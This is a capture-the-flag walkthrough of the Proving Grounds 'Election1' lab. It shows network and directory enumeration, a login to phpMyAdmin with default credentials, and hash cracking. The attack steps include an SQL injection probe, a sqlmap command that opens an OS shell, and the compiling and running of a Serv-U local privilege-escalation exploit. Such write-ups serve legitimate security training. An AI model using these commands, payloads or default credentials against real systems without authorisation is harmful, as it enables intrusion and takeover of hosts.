PG - Election1

PG – Election1

In this walk through, we will be going through the Election1 room from Proving Grounds. This room is rated as Intermediate on the platform and it consists of exploitation of two CVE’s – one for initial access and other for privilege escalation. So, let’s get started without any delay.

Election1

Machine Info:

TitleElection1
IPaddress192.168.159.211
DifficultyIntermediate
OSLinux
DescriptionElection is an intermediate level machine which leverages the exploitation of two CVE’s – one for initial access and other for privilege escalation.

Enumeration:

  • I started off with my regular aggressive nmap scan and found two ports opened – 22 (SSH) and 80 (HTTP).

$ sudo nmap -A 192.168.159.211
[sudo] password for wh1terose: 
Starting Nmap 7.80 ( https://nmap.org ) at 2024-01-05 11:39 IST

Nmap scan report for 192.168.159.211
Host is up (0.19s latency).
Not shown: 997 closed ports
PORT   STATE    SERVICE VERSION
22/tcp open     ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 20:d1:ed:84:cc:68:a5:a7:86:f0:da:b8:92:3f:d9:67 (RSA)
|   256 78:89:b3:a2:75:12:76:92:2a:f9:8d:27:c1:08:a7:b9 (ECDSA)
|_  256 b8:f4:d6:61:cf:16:90:c5:07:18:99:b0:7c:70:fd:c0 (ED25519)
| vulners: 
|   cpe:/a:openbsd:openssh:7.6p1: 
|     	EXPLOITPACK:98FE96309F9524B8C84C508837551A19	5.8	https://vulners.com/exploitpack/EXPLOITPACK:98FE96309F9524B8C84C508837551A19	*EXPLOIT*
|     	EXPLOITPACK:5330EA02EBDE345BFC9D6DDDD97F9E97	5.8	https://vulners.com/exploitpack/EXPLOITPACK:5330EA02EBDE345BFC9D6DDDD97F9E97	*EXPLOIT*
|     	EDB-ID:46516	5.8	https://vulners.com/exploitdb/EDB-ID:46516	*EXPLOIT*
|     	EDB-ID:46193	5.8	https://vulners.com/exploitdb/EDB-ID:46193	*EXPLOIT*
|     	CVE-2019-6111	5.8	https://vulners.com/cve/CVE-2019-6111
|     	1337DAY-ID-32328	5.8	https://vulners.com/zdt/1337DAY-ID-32328*EXPLOIT*
|     	1337DAY-ID-32009	5.8	https://vulners.com/zdt/1337DAY-ID-32009*EXPLOIT*
|     	SSH_ENUM	5.0	https://vulners.com/canvas/SSH_ENUM	*EXPLOIT*
|     	PRION:CVE-2018-15919	5.0	https://vulners.com/prion/PRION:CVE-2018-15919
|     	PRION:CVE-2018-15473	5.0	https://vulners.com/prion/PRION:CVE-2018-15473
|     	PACKETSTORM:150621	5.0	https://vulners.com/packetstorm/PACKETSTORM:150621	*EXPLOIT*
|     	EXPLOITPACK:F957D7E8A0CC1E23C3C649B764E13FB0	5.0	https://vulners.com/exploitpack/EXPLOITPACK:F957D7E8A0CC1E23C3C649B764E13FB0	*EXPLOIT*
|     	EXPLOITPACK:EBDBC5685E3276D648B4D14B75563283	5.0	https://vulners.com/exploitpack/EXPLOITPACK:EBDBC5685E3276D648B4D14B75563283	*EXPLOIT*
|     	EDB-ID:45939	5.0	https://vulners.com/exploitdb/EDB-ID:45939	*EXPLOIT*
|     	EDB-ID:45233	5.0	https://vulners.com/exploitdb/EDB-ID:45233	*EXPLOIT*
|     	CVE-2018-15919	5.0	https://vulners.com/cve/CVE-2018-15919
|     	CVE-2018-15473	5.0	https://vulners.com/cve/CVE-2018-15473
|     	1337DAY-ID-31730	5.0	https://vulners.com/zdt/1337DAY-ID-31730*EXPLOIT*
|     	PRION:CVE-2019-16905	4.4	https://vulners.com/prion/PRION:CVE-2019-16905
|     	CVE-2020-14145	4.3	https://vulners.com/cve/CVE-2020-14145
|     	PRION:CVE-2019-6110	4.0	https://vulners.com/prion/PRION:CVE-2019-6110
|     	PRION:CVE-2019-6109	4.0	https://vulners.com/prion/PRION:CVE-2019-6109
|     	CVE-2019-6110	4.0	https://vulners.com/cve/CVE-2019-6110
|     	CVE-2019-6109	4.0	https://vulners.com/cve/CVE-2019-6109
|     	PRION:CVE-2019-6111	2.6	https://vulners.com/prion/PRION:CVE-2019-6111
|     	PRION:CVE-2018-20685	2.6	https://vulners.com/prion/PRION:CVE-2018-20685
|     	CVE-2018-20685	2.6	https://vulners.com/cve/CVE-2018-20685
|     	PACKETSTORM:151227	0.0	https://vulners.com/packetstorm/PACKETSTORM:151227	*EXPLOIT*
|     	MSF:AUXILIARY-SCANNER-SSH-SSH_ENUMUSERS-	0.0	https://vulners.com/metasploit/MSF:AUXILIARY-SCANNER-SSH-SSH_ENUMUSERS-	*EXPLOIT*
|_    	1337DAY-ID-30937	0.0	https://vulners.com/zdt/1337DAY-ID-30937*EXPLOIT*
53/tcp filtered domain
80/tcp open     http    Apache httpd 2.4.29 ((Ubuntu))
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: Apache2 Ubuntu Default Page: It works
| vulners: 
|   cpe:/a:apache:http_server:2.4.29: 
|     	CVE-2019-9517	7.8	https://vulners.com/cve/CVE-2019-9517
|     	PACKETSTORM:171631	7.5	https://vulners.com/packetstorm/PACKETSTORM:171631	*EXPLOIT*
|     	EDB-ID:51193	7.5	https://vulners.com/exploitdb/EDB-ID:51193	*EXPLOIT*
|     	CVE-2022-31813	7.5	https://vulners.com/cve/CVE-2022-31813
|     	CVE-2022-23943	7.5	https://vulners.com/cve/CVE-2022-23943
|     	CVE-2022-22720	7.5	https://vulners.com/cve/CVE-2022-22720
|     	CVE-2021-44790	7.5	https://vulners.com/cve/CVE-2021-44790
|     	CVE-2021-39275	7.5	https://vulners.com/cve/CVE-2021-39275
|     	CVE-2021-26691	7.5	https://vulners.com/cve/CVE-2021-26691
|     	CNVD-2022-73123	7.5	https://vulners.com/cnvd/CNVD-2022-73123
|     	CNVD-2022-03225	7.5	https://vulners.com/cnvd/CNVD-2022-03225
|     	CNVD-2021-102386	7.5	https://vulners.com/cnvd/CNVD-2021-102386
|     	1337DAY-ID-38427	7.5	https://vulners.com/zdt/1337DAY-ID-38427*EXPLOIT*
|     	EXPLOITPACK:44C5118F831D55FAF4259C41D8BDA0AB	7.2	https://vulners.com/exploitpack/EXPLOITPACK:44C5118F831D55FAF4259C41D8BDA0AB	*EXPLOIT*
|     	EDB-ID:46676	7.2	https://vulners.com/exploitdb/EDB-ID:46676	*EXPLOIT*
|     	CVE-2019-0211	7.2	https://vulners.com/cve/CVE-2019-0211
|     	1337DAY-ID-32502	7.2	https://vulners.com/zdt/1337DAY-ID-32502*EXPLOIT*
|     	FDF3DFA1-ED74-5EE2-BF5C-BA752CA34AE8	6.8	https://vulners.com/githubexploit/FDF3DFA1-ED74-5EE2-BF5C-BA752CA34AE8	*EXPLOIT*
|     	CVE-2021-40438	6.8	https://vulners.com/cve/CVE-2021-40438
|     	CVE-2020-35452	6.8	https://vulners.com/cve/CVE-2020-35452
|     	CVE-2018-1312	6.8	https://vulners.com/cve/CVE-2018-1312
|     	CVE-2017-15715	6.8	https://vulners.com/cve/CVE-2017-15715
|     	CNVD-2022-03224	6.8	https://vulners.com/cnvd/CNVD-2022-03224
|     	AE3EF1CC-A0C3-5CB7-A6EF-4DAAAFA59C8C	6.8	https://vulners.com/githubexploit/AE3EF1CC-A0C3-5CB7-A6EF-4DAAAFA59C8C	*EXPLOIT*
|     	8AFB43C5-ABD4-52AD-BB19-24D7884FF2A2	6.8	https://vulners.com/githubexploit/8AFB43C5-ABD4-52AD-BB19-24D7884FF2A2	*EXPLOIT*
|     	4810E2D9-AC5F-5B08-BFB3-DDAFA2F63332	6.8	https://vulners.com/githubexploit/4810E2D9-AC5F-5B08-BFB3-DDAFA2F63332	*EXPLOIT*
|     	4373C92A-2755-5538-9C91-0469C995AA9B	6.8	https://vulners.com/githubexploit/4373C92A-2755-5538-9C91-0469C995AA9B	*EXPLOIT*
|     	36618CA8-9316-59CA-B748-82F15F407C4F	6.8	https://vulners.com/githubexploit/36618CA8-9316-59CA-B748-82F15F407C4F	*EXPLOIT*
|     	0095E929-7573-5E4A-A7FA-F6598A35E8DE	6.8	https://vulners.com/githubexploit/0095E929-7573-5E4A-A7FA-F6598A35E8DE	*EXPLOIT*
|     	OSV:BIT-2023-31122	6.4	https://vulners.com/osv/OSV:BIT-2023-31122
|     	CVE-2022-28615	6.4	https://vulners.com/cve/CVE-2022-28615
|     	CVE-2021-44224	6.4	https://vulners.com/cve/CVE-2021-44224
|     	CVE-2019-10082	6.4	https://vulners.com/cve/CVE-2019-10082
|     	CVE-2019-0217	6.0	https://vulners.com/cve/CVE-2019-0217
|     	CVE-2022-22721	5.8	https://vulners.com/cve/CVE-2022-22721
|     	CVE-2020-1927	5.8	https://vulners.com/cve/CVE-2020-1927
|     	CVE-2019-10098	5.8	https://vulners.com/cve/CVE-2019-10098
|     	1337DAY-ID-33577	5.8	https://vulners.com/zdt/1337DAY-ID-33577*EXPLOIT*
|     	CVE-2022-36760	5.1	https://vulners.com/cve/CVE-2022-36760
|     	OSV:BIT-2023-45802	5.0	https://vulners.com/osv/OSV:BIT-2023-45802
|     	OSV:BIT-2023-43622	5.0	https://vulners.com/osv/OSV:BIT-2023-43622
|     	F7F6E599-CEF4-5E03-8E10-FE18C4101E38	5.0	https://vulners.com/githubexploit/F7F6E599-CEF4-5E03-8E10-FE18C4101E38	*EXPLOIT*
|     	E5C174E5-D6E8-56E0-8403-D287DE52EB3F	5.0	https://vulners.com/githubexploit/E5C174E5-D6E8-56E0-8403-D287DE52EB3F	*EXPLOIT*
|     	DB6E1BBD-08B1-574D-A351-7D6BB9898A4A	5.0	https://vulners.com/githubexploit/DB6E1BBD-08B1-574D-A351-7D6BB9898A4A	*EXPLOIT*
|     	CVE-2022-37436	5.0	https://vulners.com/cve/CVE-2022-37436
|     	CVE-2022-30556	5.0	https://vulners.com/cve/CVE-2022-30556
|     	CVE-2022-29404	5.0	https://vulners.com/cve/CVE-2022-29404
|     	CVE-2022-28614	5.0	https://vulners.com/cve/CVE-2022-28614
|     	CVE-2022-26377	5.0	https://vulners.com/cve/CVE-2022-26377
|     	CVE-2022-22719	5.0	https://vulners.com/cve/CVE-2022-22719
|     	CVE-2021-34798	5.0	https://vulners.com/cve/CVE-2021-34798
|     	CVE-2021-33193	5.0	https://vulners.com/cve/CVE-2021-33193
|     	CVE-2021-26690	5.0	https://vulners.com/cve/CVE-2021-26690
|     	CVE-2020-9490	5.0	https://vulners.com/cve/CVE-2020-9490
|     	CVE-2020-1934	5.0	https://vulners.com/cve/CVE-2020-1934
|     	CVE-2019-17567	5.0	https://vulners.com/cve/CVE-2019-17567
|     	CVE-2019-10081	5.0	https://vulners.com/cve/CVE-2019-10081
|     	CVE-2019-0220	5.0	https://vulners.com/cve/CVE-2019-0220
|     	CVE-2019-0196	5.0	https://vulners.com/cve/CVE-2019-0196
|     	CVE-2018-17199	5.0	https://vulners.com/cve/CVE-2018-17199
|     	CVE-2018-17189	5.0	https://vulners.com/cve/CVE-2018-17189
|     	CVE-2018-1333	5.0	https://vulners.com/cve/CVE-2018-1333
|     	CVE-2018-1303	5.0	https://vulners.com/cve/CVE-2018-1303
|     	CVE-2017-15710	5.0	https://vulners.com/cve/CVE-2017-15710
|     	CVE-2006-20001	5.0	https://vulners.com/cve/CVE-2006-20001
|     	CNVD-2023-93320	5.0	https://vulners.com/cnvd/CNVD-2023-93320
|     	CNVD-2023-80558	5.0	https://vulners.com/cnvd/CNVD-2023-80558
|     	CNVD-2022-73122	5.0	https://vulners.com/cnvd/CNVD-2022-73122
|     	CNVD-2022-53584	5.0	https://vulners.com/cnvd/CNVD-2022-53584
|     	CNVD-2022-53582	5.0	https://vulners.com/cnvd/CNVD-2022-53582
|     	CNVD-2022-03223	5.0	https://vulners.com/cnvd/CNVD-2022-03223
|     	C9A1C0C1-B6E3-5955-A4F1-DEA0E505B14B	5.0	https://vulners.com/githubexploit/C9A1C0C1-B6E3-5955-A4F1-DEA0E505B14B	*EXPLOIT*
|     	BD3652A9-D066-57BA-9943-4E34970463B9	5.0	https://vulners.com/githubexploit/BD3652A9-D066-57BA-9943-4E34970463B9	*EXPLOIT*
|     	B0208442-6E17-5772-B12D-B5BE30FA5540	5.0	https://vulners.com/githubexploit/B0208442-6E17-5772-B12D-B5BE30FA5540	*EXPLOIT*
|     	A820A056-9F91-5059-B0BC-8D92C7A31A52	5.0	https://vulners.com/githubexploit/A820A056-9F91-5059-B0BC-8D92C7A31A52	*EXPLOIT*
|     	9814661A-35A4-5DB7-BB25-A1040F365C81	5.0	https://vulners.com/githubexploit/9814661A-35A4-5DB7-BB25-A1040F365C81	*EXPLOIT*
|     	5A864BCC-B490-5532-83AB-2E4109BB3C31	5.0	https://vulners.com/githubexploit/5A864BCC-B490-5532-83AB-2E4109BB3C31	*EXPLOIT*
|     	17C6AD2A-8469-56C8-BBBE-1764D0DF1680	5.0	https://vulners.com/githubexploit/17C6AD2A-8469-56C8-BBBE-1764D0DF1680	*EXPLOIT*
|     	CVE-2020-11993	4.3	https://vulners.com/cve/CVE-2020-11993
|     	CVE-2019-10092	4.3	https://vulners.com/cve/CVE-2019-10092
|     	CVE-2018-1302	4.3	https://vulners.com/cve/CVE-2018-1302
|     	CVE-2018-1301	4.3	https://vulners.com/cve/CVE-2018-1301
|     	CVE-2018-11763	4.3	https://vulners.com/cve/CVE-2018-11763
|     	4013EC74-B3C1-5D95-938A-54197A58586D	4.3	https://vulners.com/githubexploit/4013EC74-B3C1-5D95-938A-54197A58586D	*EXPLOIT*
|     	1337DAY-ID-35422	4.3	https://vulners.com/zdt/1337DAY-ID-35422*EXPLOIT*
|     	1337DAY-ID-33575	4.3	https://vulners.com/zdt/1337DAY-ID-33575*EXPLOIT*
|     	CVE-2018-1283	3.5	https://vulners.com/cve/CVE-2018-1283
|_    	PACKETSTORM:152441	0.0	https://vulners.com/packetstorm/PACKETSTORM:152441	*EXPLOIT*
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:
OS:SCAN(V=7.80%E=4%D=1/5%OT=22%CT=1%CU=34629%PV=Y%DS=4%DC=T%G=Y%TM=65979D21
OS:%P=x86_64-pc-linux-gnu)SEQ(SP=102%GCD=1%ISR=109%TI=Z%II=I%TS=A)OPS(O1=M5
OS:4EST11NW7%O2=M54EST11NW7%O3=M54ENNT11NW7%O4=M54EST11NW7%O5=M54EST11NW7%O
OS:6=M54EST11)WIN(W1=FE88%W2=FE88%W3=FE88%W4=FE88%W5=FE88%W6=FE88)ECN(R=Y%D
OS:F=Y%T=40%W=FAF0%O=M54ENNSNW7%CC=Y%Q=)T1(R=Y%DF=Y%T=40%S=O%A=S+%F=AS%RD=0
OS:%Q=)T2(R=N)T3(R=N)T4(R=N)T5(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)T
OS:6(R=N)T7(R=N)U1(R=Y%DF=N%T=40%IPL=164%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=D34
OS:E%RUD=G)IE(R=Y%DFI=N%T=40%CD=S)

Network Distance: 4 hops
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE (using port 587/tcp)
HOP RTT       ADDRESS
1   192.16 ms 192.168.45.1
2   192.12 ms 192.168.45.254
3   192.19 ms 192.168.251.1
4   192.25 ms 192.168.159.211

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 36.21 seconds

nmap scan

port 80 opened

  • Enumerated the web server running on port 80 and found a Default Apache2 Page.

Apache2 Default Page

Directory Bruteforcing

  • Fired gobuster on the web server to reveal some hidden directories and found two interesting ones – phpmyadmin and robots.txt

$ gobuster dir -u http://192.168.159.211/ -w ~/Desktop/Wordlist/SecLists/Discovery/Web-Content/raft-small-directories-lowercase.txt -x php,txt,html
===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://192.168.159.211/
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /home/wh1terose/Desktop/Wordlist/SecLists/Discovery/Web-Content/raft-small-directories-lowercase.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.1.0
[+] Extensions:              txt,html,php
[+] Timeout:                 10s
===============================================================
2024/01/05 11:49:22 Starting gobuster in directory enumeration mode
===============================================================
/javascript           (Status: 301) [Size: 323] [--> http://192.168.159.211/javascript/]
/index.html           (Status: 200) [Size: 10918]                                       
/phpmyadmin           (Status: 301) [Size: 323] [--> http://192.168.159.211/phpmyadmin/]
/robots.txt           (Status: 200) [Size: 30]     

gobuster scan

  • I first check the phpmyadmin page and it was accessible to us. I tried the default username and password – root:password but access was denied. So, i left it there only.

Phpmyadmin login panel

  • Next, i checked the robots.txt file which reveals an interesting directory called election. As it is same as the name of the box, so this is worth checking.

robots.txt

Enumerating Election System

  • The directory reveals an Web based Election Management System. On the front page there was a candidates section which shows the candidate name and username.

Election Management System

  • Along with that, we can also type Voter’s code to vote for the candidate however it first needs registration from the admin section.

Type Voter's Code

  • I performed another directory bruteforce attack using gobuster but this time on /election directory and it reveals the required admin backend directory which was /admin only. LOL!

$ gobuster dir -u http://192.168.171.211/election/ -w ~/Desktop/Wordlist/SecLists/Discovery/Web-Content/raft-small-directories-lowercase.txt
===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://192.168.171.211/election/
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /home/wh1terose/Desktop/Wordlist/SecLists/Discovery/Web-Content/raft-small-directories-lowercase.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.1.0
[+] Timeout:                 10s
===============================================================
2024/01/05 13:22:04 Starting gobuster in directory enumeration mode
===============================================================
/media                (Status: 301) [Size: 327] [--> http://192.168.171.211/election/media/]
/js                   (Status: 301) [Size: 324] [--> http://192.168.171.211/election/js/]   
/admin                (Status: 301) [Size: 327] [--> http://192.168.171.211/election/admin/]
/themes               (Status: 301) [Size: 328] [--> http://192.168.171.211/election/themes/]
/lib                  (Status: 301) [Size: 325] [--> http://192.168.171.211/election/lib/]   
/data                 (Status: 301) [Size: 326] [--> http://192.168.171.211/election/data/]  
/languages            (Status: 301) [Size: 331] [--> http://192.168.171.211/election/languages/]

gobuster scan

  • Navigated to the found directory, reveals a page which required an alredy existing admin ID to proceed further. I tried various inputs like 1, admin1, Love, 2, etc but all failed. Next, i tried to perform an SQL authentication bypass and changed some parameters to bypass the restriction using Burpsuite but all failed.

Enter admin ID

Burpsuite POST request

Enumerating phpMyAdmin

  • I moved back to enumerate the phpMyAdmin login panel. This time tried bunch of common username/password combo and got a postive on root:toor.

PHPmyadmin login panel

  • Once inside, looked at all the databases thoroughly, found some hashed passwords too. Cracked them and saved them if they might required further.

phpmyadmin backend

Got hashes

Cracked the hashes

  • Now at this point, i was trying to get a reverse shell via PhpMyAdmin but that technique failed. Sometimes, we do not see what’s in front of us and try more complex methods to get in where in reality the answer was in front of us, this whole time. In one of the databases named “tb_panitia”, i got the hash password of user “Love”

Got Love hashed password

hashes.com cracked

  • With the found Admin ID and password, got into the election backend dashboard.

Entering admin ID

Login as Love

eLection backend

Initial Access:

  • Upon checking the system info of the running application, came to know that it is running on Patch Update “2”, found a number of exploits one but the right one was the SQL Injection one with CVE-2020–9340.

eLection Arctic Fox version

eLection 2.0 SQL Injection exploit

Exploiting CVE-2020–9340

  • In order to exploit the SQL Injection in the candidate registration section of the application. We first have to create a demo user.

Creating a user

  • Next, intercept the request of editing the user via Burpsuite and analyzed the response by changing the number in the “id” parameter. When i keep the id as “77” for my demo user, i got a positive response back with the details of the user in JSON format.

Burpsuite POST request

200 OK response

  • I changed the ID to something random and got a 404 response.

Burpsuite POST request

code 404 Response

  • Used a common SQL Injection payload on the ID parameter and it gives me a positive response confirming it is vulnerable to SQL injection.

# ID value may differ as per your user.

77 AND 1=1

Burpsuite injection SQL payload

Burpsuite Response

  • Now we will be leveraging sqlmap to get a command shell on the target using SQL injection. For that, save the Burpsuite request to a file named request.txt and trigger sqlmap on it. After a while, we will get a shell prompt.

sqlmap -r request.txt --level=5 --risk=3 --os-shell -p id

Using sqlmap on the target

got the os-shell access

  • Upon checking the system.log file in the /admin/logs directory reveals the password of user Love.

cat /var/www/html/election/admin/logs/system.log

looking into system.log file

  • Got our initial foothold on the target via SSH using the found credentials.

ssh [email protected]
P@$$w0rd@123

logged in as user love via SSH

  • Captured the user and local flag.

user flag

local flag

Privilege Escalation:

  • Next, i uploaded Linpeas on the target to get some priv-esc attack vectors and got an unusual binary called Serv-U which was vulnerable to CVE-2019-12181. We can also find this binary with the below command.

find / -perm -u=s -type f 2>/dev/null

Linpeas Output

  • Checked for the known exploits for Serv-U and it confirms a Local Privilege escalation exploit.

searchsploit Serv-U

searchsploit Serv-U

Serv-U FTP server Local Priv esc exploit

  • Copied the exploit to my working directory and then uploaded it to the target.

searchsploit -m inux/local/47009.c

47009.c exploit

download the exploit on the target

  • Compiled the exploit and fired it which grants me root access on the target.

gcc 47009.c -o exploit
./exploit

got root

  • Finally, captured the proof.txt flag and completed the challenge.

proof flag

Also Read: PG – DriftingBlues6

Conclusion:

Conclusion

So that was Election1for you. We started off with a regular nmap scan and only two ports opened – 22 (SSH) and 80 (HTTP). Enumerated the web server on port 80 and found a Election Management System. Further enumeration reveals phpmyadmin installation. Tried bunch of common username and password combinations and successfully got in using root:toor. Next, gathered the hashed password from the DB of user Love and then cracked it using hashes.com. With the found password, logged into the Election Management System. Enumerated the version running on it and found out that it is vulnerable to CVE-2020–9340. Used the same to get the initial access on the target. For privilege escalation, used the Serv-U Local Privilege Escalation exploit to get root on the target. On that note, i would take your leave and will meet you in next one. Till then, “Happy hacking”.

Leave a Comment

Your email address will not be published. Required fields are marked *

Scroll to Top